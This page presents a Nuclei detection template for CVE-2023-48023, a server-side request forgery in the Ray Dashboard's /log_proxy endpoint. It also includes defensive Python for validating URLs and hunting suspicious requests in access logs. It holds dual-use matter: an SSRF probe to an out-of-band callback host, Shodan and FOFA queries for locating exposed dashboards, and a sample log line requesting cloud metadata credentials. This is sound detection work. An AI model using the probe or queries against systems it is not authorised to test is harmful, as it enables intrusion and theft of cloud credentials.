Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
ID: CVE-2023-48023
Severity: critical
Author: cookiehanhoan,harryha
Tags: cve,cve2023,ssrf,ray,anyscale,Anyscale
Description
The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
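The description above pins the defect on the url parameter accepting any HTTP or HTTPS URL, i.e. a scheme check with no restriction on the destination host. As an added example (not code from the Ray project or from this template), the Python below shows the validation a log-proxy style endpoint needs on the defending side: an explicit host allowlist, rejection of userinfo tricks, and rejection of literal loopback, private and link-local addresses (the range the cloud metadata service lives in). It also applies the same check to constructed dashboard access-log lines so the vulnerable request pattern can be hunted retroactively. The hostnames in ALLOWED_HOSTS and the log lines are constructed assumptions, not real configuration or traffic.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the only hosts this dashboard should ever proxy log
# requests to (hypothetical names, not real Ray configuration).
ALLOWED_HOSTS = {"ray-head.internal", "ray-worker-1.internal"}


def is_allowed_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return True only when `url` is an http(s) URL whose host is on the
    allowlist and is not a literal loopback/private/link-local address.

    This is the validation the vulnerable endpoint lacked: it accepted any
    http/https URL, so a scheme check alone is not enough.
    """
    try:
        parts = urlsplit(url)
    except ValueError:              # e.g. malformed IPv6 literal "http://[::1"
        return False
    if parts.scheme not in ("http", "https"):
        return False
    # Reject userinfo: "http://trusted@other" parses with hostname "other",
    # and a naive check on the raw netloc string would be fooled.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname           # already lower-cased, brackets stripped
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None                 # a hostname, not an IP literal
    if addr is not None and (addr.is_private or addr.is_loopback
                             or addr.is_link_local or addr.is_multicast
                             or addr.is_reserved or addr.is_unspecified):
        return False                # covers 169.254.x.x, 127.0.0.1, ::1, RFC 1918
    return host in allowed_hosts


# Matches the request line of a common-log-format access log entry.
LOG_PROXY_REQUEST = re.compile(r'"(?:GET|POST) (/log_proxy\?[^ "]*) HTTP/')


def flag_log_proxy_requests(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_ip, target_url) for every /log_proxy request whose
    url parameter fails is_allowed_target(); for hunting in dashboard
    access logs after patching."""
    flagged = []
    for line in log_lines:
        m = LOG_PROXY_REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for target in parse_qs(query).get("url", []):
            if not is_allowed_target(target, allowed_hosts):
                flagged.append((line.split()[0], target))
    return flagged


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /log_proxy?url=http://ray-worker-1.internal:8265/logs HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /log_proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /log_proxy?url=http://oast.example/ HTTP/1.1" 200 64',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /api/version HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for client, target in flag_log_proxy_requests(SAMPLE_LOG):
        print(f"suspicious /log_proxy request from {client} -> {target}")
```

The allowlist is the load-bearing control; the IP-literal checks are a second layer for the case where an allowlisted entry is itself an address. Note that a hostname allowlist says nothing about what the name resolves to at request time, so a production implementation should resolve once, check the resulting address with the same predicate, and connect to that pinned address rather than re-resolving.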
YAML Source
id: CVE-2023-48023

info:
  name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
  author: cookiehanhoan,harryha
  severity: critical
  description: |
    The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
  impact: |
    The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-48023
    cwe-id: CWE-441,CWE-918
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    product: ray
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,ssrf,ray,anyscale,Anyscale

http:
  - method: GET
    path:
      - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 490a00463044022024800206376636f832e86eee353474fb383bfed46802b9ada0b0a05dd7275d800220768ec72e0cb2b03ab786faaee1916e4155f02f9e0d0f354fa6ec545e992e6d40:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-48023.yaml"